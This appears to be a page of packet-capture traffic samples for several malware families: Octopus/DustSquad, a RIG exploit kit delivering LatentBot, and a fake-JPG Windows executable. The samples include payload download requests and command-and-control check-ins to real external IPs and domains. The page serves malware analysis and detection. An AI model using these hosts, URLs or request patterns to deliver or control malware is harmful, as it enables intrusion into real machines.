Text Example

OCTOPUS APT/2 Malware PCAP Download Traffic Analysis 88.198.204.196

2018-11-06 03:08:56.939686 IP 10.1.10.73.65480 > 10.1.10.100.55555: Flags [P.], seq 1:562, ack 1, win 2053, length 561
E..YJs@….}
.
I
.
d….*…….P…….GET /apt/DustSquad/OctopusDelphi.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://10.1.10.100:55555/apt/DustSquad/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: 10.1.10.100:55555
Connection: Keep-Alive

2018-11-06 03:08:56.939868 IP 10.1.10.100.55555 > 10.1.10.73.65480: Flags [.], ack 562, win 237, length 0

.
I…….P……………………… 2018-11-06 03:09:11.604468 IP 148.251.185.168.80 > 10.1.10.73.65490: Flags [S.], seq 949224391, ack 3926170411, win 65535, options [mss 1460,nop,wscale 6,sackOK,eol], length 0 E .4..@./……. . I.P..8……+….Kg………….. 2018-11-06 03:09:11.604766 IP 10.1.10.73.65490 > 148.251.185.168.80: Flags [.], ack 1, win 256, length 0 E..(!.@…u. . I…….P…+8…P….7…….. 2018-11-06 03:09:11.608831 IP 10.1.10.73.65490 > 148.251.185.168.80: Flags [P.], seq 1:240, ack 1, win 256, length 239: HTTP: GET /d4.php?check HTTP/1.1 E…!.@…u. . I…….P…+8…P…….GET /d4.php?check HTTP/1.1 Host: 148.251.185.168 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0

2018-11-06 03:09:11.735371 IP 148.251.185.168.80 > 10.1.10.73.65490: Flags [P.], seq 1:325, ack 240, win 1026, length 324: HTTP: HTTP/1.1 404 Not Found
E .l..@./..~….
.

I.P..8…….P…….HTTP/1.1 404 Not Found

.
IX……P…….RP….k……..
2018-11-06 03:09:11.866394 IP 148.251.185.168.80 > 10.1.10.73.65490: Flags [F.], seq 325, ack 241, win 1026, length 0
E .(..@./…….
.
I.P..8…….P………….
2018-11-06 03:09:11.866628 IP 10.1.10.73.65490 > 148.251.185.168.80: Flags [.], ack 326, win 255, length 0
E..(!.@…u.
.
I…….P….8…P………….
2018-11-06 03:09:11.869397 IP 10.1.10.73.65491 > 88.198.204.196.80: Flags [P.], seq 1:239, ack 1, win 256, length 238: HTTP: GET /d4.php?check HTTP/1.1
E…..@….Q
.
IX……P…….RP…….GET /d4.php?check HTTP/1.1
Host: 88.198.204.196
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0

2018-11-06 03:09:11.995486 IP 88.198.204.196.80 > 10.1.10.73.65491: Flags [.], ack 239, win 123, length 0
E .(=E@.0…X…
.

I.P…..R….P..{……….

.
IX……P..q…………………….
2018-11-06 03:09:13.175672 IP 88.198.204.196.80 > 10.1.10.73.65493: Flags [S.], seq 1943939956, ack 4008735111, win 14600, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0
E .4..@.0…X…
.
I.P..s.+t..q…9..3…………..
2018-11-06 03:09:13.175994 IP 10.1.10.73.65493 > 88.198.204.196.80: Flags [.], ack 1, win 256, length 0
E..(..@….;
.
IX……P..q.s.+uP…u………
2018-11-06 03:09:13.193802 IP 10.1.10.73.65493 > 88.198.204.196.80: Flags [P.], seq 1:241, ack 1, win 256, length 240: HTTP: GET /d4.php?check HTTP/1.1
E…..@….J
.
IX……P..q.s.+uP…….GET /d4.php?check HTTP/1.1
Host: www.runa-ldn.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0

2018-11-06 03:09:13.314178 IP 88.198.204.196.80 > 10.1.10.73.65493: Flags [.], ack 241, win 123, length 0
E .(.I@.0.k.X…
.

I.P..s.+u..rwP..{t………

.
Ihv.6…P..w…………………….
2018-11-06 03:09:44.234391 IP 104.118.190.54.80 > 10.1.10.73.65508: Flags [S.], seq 565809931, ack 3247929270, win 29200, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0
E .4..@.8…hv.6
.
I.P..!…..w…r……………..
2018-11-06 03:09:44.234657 IP 10.1.10.73.65508 > 104.118.190.54.80: Flags [.], ack 1, win 256, length 0
E..(Y6@…f.
.
Ihv.6…P..w.!…P………….
2018-11-06 03:09:54.671156 IP 10.1.10.73.65508 > 104.118.190.54.80: Flags [P.], seq 1:230, ack 1, win 256, length 229: HTTP: POST /vpninfo/servers HTTP/1.1
E…Y7@…e.
.
Ihv.6…P..w.!…P…….POST /vpninfo/servers HTTP/1.1
Host: www.privateinternetaccess.com
Accept-Encoding: gzip;q=1.0,deflate;q=0.6,identity;q=0.3
Accept: /
User-Agent: Ruby
Content-Length: 49
Content-Type: application/x-www-form-urlencoded

2018-11-06 03:09:54.672196 IP 10.1.10.73.65508 > 104.118.190.54.80: Flags [P.], seq 230:279, ack 1, win 256, length 49: HTTP

E..YY8@…fp

I
.
d…..\
.)~..P………….
2018-11-06 03:10:22.717526 IP 10.1.10.73.65527 > 10.1.10.100.55555: Flags [P.], seq 1:580, ack 1, win 2053, length 579
E..kLW@…..
.
I
.
d…..\
.)~..P…9…GET /apt/DustSquad/OctopusTelegramMessengerDropper.bin HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, /
Referer: http://10.1.10.100:55555/apt/DustSquad/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: 10.1.10.100:55555
Connection: Keep-Alive

2018-11-06 03:10:22.717734 IP 10.1.10.100.55555 > 10.1.10.73.65527: Flags [.], ack 580, win 238, length 0

E .4.?@.m…%..)
.
I._….mvF.w…q .t…………..
2018-11-06 03:11:34.409113 IP 10.1.10.73.49182 > 37.244.26.41.1119: Flags [.], ack 1, win 256, length 0
E..(.A@….(
.
I%..)…_F.w…mwP…pb……..
2018-11-06 03:11:34.409705 IP 10.1.10.73.49182 > 37.244.26.41.1119: Flags [P.], seq 1:140, ack 1, win 256, length 139
E….B@…..
.
I%..)…_F.w…mwP….f..GET /catalogs/cdns?nocache=15414882944368240 HTTP/1.1
Host: us.patch.battle.net:1119
User-Agent: Battle.net/1.12.5.10671
Accept: /

2018-11-06 03:11:34.413491 IP 37.244.26.41.1119 > 10.1.10.73.49183: Flags [S.], seq 1499628406, ack 606991932, win 28960, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E .4.@@.m…%..)
.
I...Yb.v$-.<..q ……………. 2018-11-06 03:11:34.413719 IP 10.1.10.73.49183 > 37.244.26.41.1119: Flags [.], ack 1, win 256, length 0 E..(.C@….& . I%..)…$-. 37.244.26.41.1119: Flags [P.], seq 1:144, ack 1, win 256, length 143
E….D@…..
.
I%..)…_$-.<Yb.wP…m…GET /catalogs/versions?nocache=15414882944368240 HTTP/1.1
Host: us.patch.battle.net:1119
User-Agent: Battle.net/1.12.5.10671
Accept: /

2018-11-06 03:11:34.503109 IP 37.244.26.41.1119 > 10.1.10.73.49183: Flags [P.], seq 123:676, ack 144, win 4380, length 553
E .Q…….w%..)
.
I._..Yb..$-..P…./..Region!STRING:0|BuildConfig!HEX:16|CDNConfig!HEX:16|KeyRing!HEX:16|BuildId!DEC:4|VersionsName!String:0|ProductConfig!HEX:16

## seqn = 57858

.
I.23..4.PQ[K……….J…………..
2018-11-06 03:12:14.326073 IP 23.50.51.200.80 > 10.1.10.73.49204: Flags [S.], seq 1417380829, ack 1364937650, win 29200, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0
E .4..@.8..`.23.
.
I.P.4T{..Q[K…r.g……………
2018-11-06 03:12:14.326386 IP 10.1.10.73.49204 > 23.50.51.200.80: Flags [.], ack 1, win 256, length 0
E..(UF@…FF
.
I.23..4.PQ[K.T{..P………….
2018-11-06 03:12:14.332421 IP 10.1.10.73.49204 > 23.50.51.200.80: Flags [P.], seq 1:83, ack 1, win 256, length 82: HTTP: GET /ncc.txt HTTP/1.1
E..zUG@…E.
.
I.23..4.PQ[K.T{..P…….GET /ncc.txt HTTP/1.1
Host: ncc.avast.com
User-Agent: Avast NCC
Accept: /

2018-11-06 03:12:14.350954 IP 23.50.51.200.80 > 10.1.10.73.49204: Flags [.], ack 83, win 229, length 0
E .(..@.8..d.23.
.
I.P.4T{..Q[L.P….n……..

2018-11-06 03:12:14.351729 IP 23.50.51.200.80 > 10.1.10.73.49204: Flags [P.], seq 1:152, ack 83, win 229, length 151: HTTP: HTTP/1.1 200 OK

.P.6@…p.P………….
2018-11-06 03:13:14.499210 IP 77.234.42.247.80 > 10.1.10.73.62218: Flags [P.], seq 4535:4877, ack 302, win 3, length 342: HTTP
E .~R.@.-.m.M.*.
.
I.P.
..p..6@.P…;3….b.a+?…….u…P…..g….B`/f..y.&.L..c./….^(..y.N$….RG……J/…………..D….[s..U..@.GF9PFSFan.n….DiA..|…..{…Q…….%C..w._<!…..c=…o..^#v6..J………..J..B.-..2….P……….L…o8…….-iPp.G.C2X.^J..y.
.{.1…PA….8′..3l.Z.I……..-…B…iDN..Z….”.v…(-…y..$……w..B.E…^…..j…#…..ASWSig2B
0

2018-11-06 03:13:14.516560 IP 10.1.10.73.62218 > 77.234.42.247.80: Flags [P.], seq 302:604, ack 4877, win 255, length 302: HTTP: GET /R/A3gKIGQ1Yjc2MDk4NjNhNjQ1N2JhNmZhMjZlYjFjNzgxNGE5EgQGBREYGJcFIgH-KgcIBBCCuoZnKgcIAxDe25dmMgoIBBCCuoZnGIAKOLKSnJABQiCzHp13tjgkeEmf_uYnjqPisL61OLbIXDB0_dRDuRVZGkiAgyg= HTTP/1.1
E..VL.@….~
.
IM.*..
.P.6@…q.P…….GET /R/A3gKIGQ1Yjc2MDk4NjNhNjQ1N2JhNmZhMjZlYjFjNzgxNGE5EgQGBREYGJcFIgH-KgcIBBCCuoZnKgcIAxDe25dmMgoIBBCCuoZnGIAKOLKSnJABQiCzHp13tjgkeEmf_uYnjqPisL61OLbIXDB0_dRDuRVZGkiAgyg= HTTP/1.1
Host: su.ff.avast.com
Accept: */*
Content-Type: application/octet-stream
Pragma: no-cache
Connection: keep-alive

2018-11-06 03:13:14.589588 IP 77.234.42.247.80 > 10.1.10.73.62218: Flags [.], ack 604, win 4, length 0
E .(R.@.-.nqM.*.

.

IM... .P.6A…..P…o……… 2018-11-06 03:17:59.378603 IP 77.234.42.247.80 > 10.1.10.73.62218: Flags [P.], seq 9411:9771, ack 604, win 4, length 360: HTTP E ..R.@.-.m.M..
.
I.P.
…..6A.P….”..}.; …./..K”..<..@Hu-……=…#.5.J……..M.<.0i…..:…..*…g….gDV.{=.F……[…zfAr…I%.t…………Ux..C………..,+…|T.[.f…..>.(‘.’)7.B..+…7………^…q…..z…L……..%..c.KF. k..w_.…..0(.…H..:.=h].c…U……7Pk.Q..w1…e…,:.o.n.d.8.5…s1_=(…?|> 3..b$t.e.+…d%X.9..yp.J.dN’..P}Mv…y?.k.aS.r|.8U.rs……tASWSig2B
0

2018-11-06 03:17:59.396393 IP 10.1.10.73.62218 > 77.234.42.247.80: Flags [P.], seq 604:906, ack 9771, win 255, length 302: HTTP: GET /R/A3gKIGQ1Yjc2MDk4NjNhNjQ1N2JhNmZhMjZlYjFjNzgxNGE5EgQGBREYGJcFIgH-KgcIBBCjvIZnKgcIAxDe25dmMgoIBBCjvIZnGIAKOLKSnJABQiCzHp13tjgkeEmf_uYnjqPisL61OLbIXDB0_dRDuRVZGkiAgyg= HTTP/1.1
E..VL.@….{
.
IM.*..
.P.6A…..P…rk..GET /R/A3gKIGQ1Yjc2MDk4NjNhNjQ1N2JhNmZhMjZlYjFjNzgxNGE5EgQGBREYGJcFIgH-KgcIBBCjvIZnKgcIAxDe25dmMgoIBBCjvIZnGIAKOLKSnJABQiCzHp13tjgkeEmf_uYnjqPisL61OLbIXDB0_dRDuRVZGkiAgyg= HTTP/1.1
Host: su.ff.avast.com
Accept: */*
Content-Type: application/octet-stream
Pragma: no-cache
Connection: keep-alive

2018-11-06 03:17:59.471625 IP 77.234.42.247.80 > 10.1.10.73.62218: Flags [.], ack 906, win 4, length 0
E .(R.@.-.nkM.*.

.

.
Ihn.…P………………………. 2018-11-06 03:20:48.497232 IP 104.110.209.95.80 > 10.1.10.73.49426: Flags [S.], seq 1611496151, ack 3370241501, win 29200, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0 E .4..@.8…hn.
.
I.P...z.......r.{............... 2018-11-06 03:20:48.497541 IP 10.1.10.73.49426 > 104.110.209.95.80: Flags [.], ack 1, win 256, length 0 E..(U.@...V. . Ihn._...P.....z.P…-………
2018-11-06 03:20:48.498451 IP 10.1.10.73.49426 > 104.110.209.95.80: Flags [P.], seq 1:230, ack 1, win 256, length 229: HTTP: POST /vpninfo/servers HTTP/1.1
E…U.@…V.
.
Ihn._…P….`.z.P…<“..POST /vpninfo/servers HTTP/1.1
Host: www.privateinternetaccess.com
Accept-Encoding: gzip;q=1.0,deflate;q=0.6,identity;q=0.3
Accept: /
User-Agent: Ruby
Content-Length: 49
Content-Type: application/x-www-form-urlencoded

2018-11-06 03:20:48.498498 IP 10.1.10.73.49426 > 104.110.209.95.80: Flags [P.], seq 230:279, ack 1, win 256, length 49: HTTP
E..YU.@…V.

RIG Exploit Kit EK Delivers LATENTBOT Malware APT 148.251.255.108 Trojan RAT PCAP file download traffic sample

2016-10-26 16:40:22.706650 IP 192.168.10.20.49625 > 54.200.153.243.80: Flags [P.], seq 1:257, ack 1, win 16475, length 256: HTTP: GET / HTTP/1.1
E..(A.@…”m..
.6……P…S….P.@[.G..GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: gadistrictkiwanis.org
Connection: Keep-Alive

2016-10-26 16:40:22.869283 IP 54.200.153.243.80 > 192.168.10.20.49625: Flags [.], ack 257, win 123, length 0
E..( L@.1…6…..

..R.4…P.X{./k..P.@[&i……..
2016-10-26 16:40:30.096078 IP 192.168.10.20.49682 > 185.82.200.52.80: Flags [P.], seq 1:461, ack 1, win 16475, length 460: HTTP: GET /?wn-BcbCUKxnGDYA=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFd HTTP/1.1
E…Kl@…gf..
..R.4…P.X{./k..P.@[.’..GET /?wn-BcbCUKxnGDYA=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFd HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://gadistrictkiwanis.org/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: pevn5.l6jmgq.top
Connection: Keep-Alive

2016-10-26 16:40:30.130644 IP 185.82.200.52.80 > 192.168.10.20.49681: Flags [S.], seq 2607864839, ack 1742428895, win 14600, options [mss 1318,nop,wscale 3,nop,nop,sackOK], length 0

..R.4…P.X}./k..P.?[.x……..
2016-10-26 16:40:30.543064 IP 192.168.10.20.49682 > 185.82.200.52.80: Flags [P.], seq 461:1110, ack 2342, win 16219, length 649: HTTP: GET /index.php?wn-BcbCUKxnGDYA=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFT6wkZjuyeV7PC7kpzXlBxFlvbJN0sohfQDmK1JDEqi_WySTl-1g HTTP/1.1
E…L4@…e…
..R.4…P.X}./k..P.?[.?..GET /index.php?wn-BcbCUKxnGDYA=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFT6wkZjuyeV7PC7kpzXlBxFlvbJN0sohfQDmK1JDEqi_WySTl-1g HTTP/1.1
Accept: */*
Referer: http://pevn5.l6jmgq.top/?wn-BcbCUKxnGDYA=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFd
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: pevn5.l6jmgq.top
Connection: Keep-Alive

2016-10-26 16:40:31.656330 IP 192.168.10.20.49682 > 185.82.200.52.80: Flags [P.], seq 1110:1543, ack 55086, win 16469, length 433: HTTP: GET /index.php?wn-BcbCUKxnGDYA=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFT6wkZjuyeV7PC7kpzXlBvEQ7bJN0sohfQDmK1JDEqi_O7QDNykKM&dfgsdf=204 HTTP/1.1
E…MH@…e…
..R.4…P.X.T/l..P.@U!…GET /index.php?wn-BcbCUKxnGDYA=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFT6wkZjuyeV7PC7kpzXlBvEQ7bJN0sohfQDmK1JDEqi_O7QDNykKM&dfgsdf=204 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: pevn5.l6jmgq.top
Connection: Keep-Alive

2016-10-26 16:40:31.774878 IP 185.82.200.52.80 > 192.168.10.20.49682: Flags [.], ack 1543, win 2487, length 0
E..(+.@.:….R.4..
..P../l…X..P. …..

….l.%.P~…..+@P.@[……….
2016-10-26 16:40:35.962673 IP 192.168.10.20.49701 > 148.251.255.108.80: Flags [P.], seq 1:193, ack 1, win 16475, length 192: HTTP: GET / HTTP/1.1
E…N.@…RD..
….l.%.P~…..+@P.@[.x..GET / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 148.251.255.108
Cache-Control: no-cache

2016-10-26 16:40:36.317766 IP 148.251.255.108.80 > 192.168.10.20.49701: Flags [P.], seq 1:39, ack 193, win 64048, length 38: HTTP: HTTP/1.1 200 OK
E..NE!@.y.cv…l..
..P.%..+@~…P..0….HTTP/1.1 200 OK
CONTENT-LENGTH: 0

….l.%.P~…..+fP.@Q……….
2016-10-26 16:40:36.323107 IP 192.168.10.20.49701 > 148.251.255.108.80: Flags [P.], seq 193:717, ack 39, win 16465, length 524: HTTP: GET /QWRsN2srdjlxUUdDYVp0aTBMUzl2cStzYzF0ek1hZ2VLSWJvRGlpb0dFdTBUOHZ1M21LSTJGVFBRenlxbWNSV2FDbDV1S1Axa2FlUFE3dGZGWEVPVGdhTGZwOURhWmh3dFdHSG5laWxOdGRB HTTP/1.1
E..4N.@…P…
….l.%.P~…..+fP.@Qw…GET /QWRsN2srdjlxUUdDYVp0aTBMUzl2cStzYzF0ek1hZ2VLSWJvRGlpb0dFdTBUOHZ1M21LSTJGVFBRenlxbWNSV2FDbDV1S1Axa2FlUFE3dGZGWEVPVGdhTGZwOURhWmh3dFdHSG5laWxOdGRB HTTP/1.1
Accept: text/*, QWRsN2srdjlxUUdDYVp0aTBMUzl2cStzYzF0ek1hZ2VLSWJvRGlpb0dFdTBUOHZ1M21LSTJGVFBRenlxbWNSV2FDbDV1S1Axa2FlUFE3dGZGWEVPVGdhTGZwOURhWmh3dFdHSG5laWxOdGRB, 148.251.255.108, _^[….
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 148.251.255.108
Cache-Control: no-cache

2016-10-26 16:40:37.005980 IP 148.251.255.108.80 > 192.168.10.20.49702: Flags [P.], seq 1:75, ack 228, win 64013, length 74: HTTP: HTTP/1.1 200 OK
E..rE)@.y.cJ…l..
..P.&.t.v…%P…….HTTP/1.1 200 OK
CONTENT-TYPE: application/zip

….l.(.P……..P.@[B………
2016-10-26 16:40:37.200030 IP 192.168.10.20.49704 > 148.251.255.108.80: Flags [P.], seq 1:252, ack 1, win 16475, length 251: HTTP: GET /i30pRl1/17311674278927773327459.zip HTTP/1.1
E..#N.@…Q…
….l.(.P……..P.@[….GET /i30pRl1/17311674278927773327459.zip HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 148.251.255.108
Connection: Keep-Alive
Cache-Control: no-cache

2016-10-26 16:40:37.395131 IP 148.251.255.108.80 > 192.168.10.20.49704: Flags [P.], seq 1:75, ack 252, win 63989, length 74: HTTP: HTTP/1.1 200 OK
E..rE/@.y.cD…l..
..P.(……..P…….HTTP/1.1 200 OK

R..N…P.@[.\……..
2016-10-26 16:40:38.414779 IP 192.168.10.20.49706 > 148.251.255.108.80: Flags [P.], seq 1:193, ack 1, win 16475, length 192: HTTP: GET / HTTP/1.1
E…O8@…Q…
….l.*.P
R..N…P.@[K…GET / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 148.251.255.108
Cache-Control: no-cache

….l.4…U….M.P.>^.*..POST /$windows?ID=14103ABFD3F841C783B7B692798FAE94 HTTP/1.1
HOST: 148.251.255.108
CONTENT-LENGTH: 30

.9.^v…r1jk….~…e….e..!i
2016-10-26 16:46:37.300351 IP 148.251.255.108.443 > 192.168.10.20.49716: Flags [.], ack 3680, win 63279, length 0
E..(Tp@.y.TM…l..
….4..M..U.#P../ue..
2016-10-26 16:46:37.428227 IP 192.168.10.20.49715 > 148.251.255.108.443: Flags [P.], seq 6192:6345, ack 2159, win 15861, length 153
E…V.@…JT..
….l.3…..]…6P.=.M…POST /$windows?ID=66BF1670FEF345A0B1C166218F0112DD HTTP/1.1
HOST: 148.251.255.108
CONTENT-LENGTH: 47

@….+..9.hE…..RZ…..l.#UV….Mk<…2.jcg.^.
2016-10-26 16:46:37.552417 IP 148.251.255.108.443 > 192.168.10.20.49715: Flags [P.], seq 2159:2214, ack 6345, win 63330, length 55
E.._Tu@.y.T….l..
….3…6….P..b.#..HTTP/1.1 200 OK
CONTENT-LENGTH: 16

.A*..6J……..x

E…V.@…JR..
….l.3………mP.=…..POST /$windows?ID=66BF1670FEF345A0B1C166218F0112DD HTTP/1.1
HOST: 148.251.255.108
CONTENT-LENGTH: 45

W32/Felix Iran APT/Malware Fake JPG senario104.jpg Binary PCAP file download Traffic Sample

Unknown IRAN fake image binary file

file senario104.jpg
senario104.jpg: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

 

2016-10-23 01:32:16.438427 IP 192.168.1.102.58937 > 79.127.127.67.80: Flags [P.], seq 0:297, ack 1, win 64240, length 297: HTTP: GET /senario104.jpg HTTP/1.1
E..Q(R@…@….fO..C.9.P.R(.V…P…….GET /senario104.jpg HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: limlim00000.rozup.ir
Connection: Keep-Alive


E..((|@…A….fO..C.<.P……;NP…’………
2016-10-23 01:32:55.262559 IP 192.168.1.102.58940 > 79.127.127.67.80: Flags [P.], seq 0:203, ack 1, win 256, length 203: HTTP: GET /favicon.ico HTTP/1.1
E…(}@…@….fO..C.<.P……;NP…/a..GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: limlim00000.rozup.ir
Connection: Keep-Alive